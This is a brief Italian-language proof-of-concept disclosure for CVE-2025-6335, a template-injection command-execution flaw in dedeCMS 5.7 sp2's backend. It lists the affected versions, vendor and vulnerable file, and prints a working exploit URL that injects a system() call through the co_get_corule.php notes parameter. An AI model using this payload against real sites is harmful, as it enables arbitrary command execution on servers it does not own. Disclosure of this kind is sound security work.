
CVE-2025-6335 exploit proof-of-concept per una vulnerabilità di template injection con esecuzione di comandi in dedeCMS 5.7 sp2, che consente l'esecuzione arbitraria di comandi tramite l'interfaccia backend.
BUG_Author: Ewoji
Versione interessata: dedeCMS < 5.7.2
Fornitore: Shanghai Zhuozhuo Network Technology Co., LTD
Software: dedeCMS
File vulnerabili:
/include/dedetag.class.phpDopo l'installazione, accedi al pannello di amministrazione
Sfruttamento del template
Verifica dello sfruttamento:
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accedendo due volte in questo modo si può eseguire il comando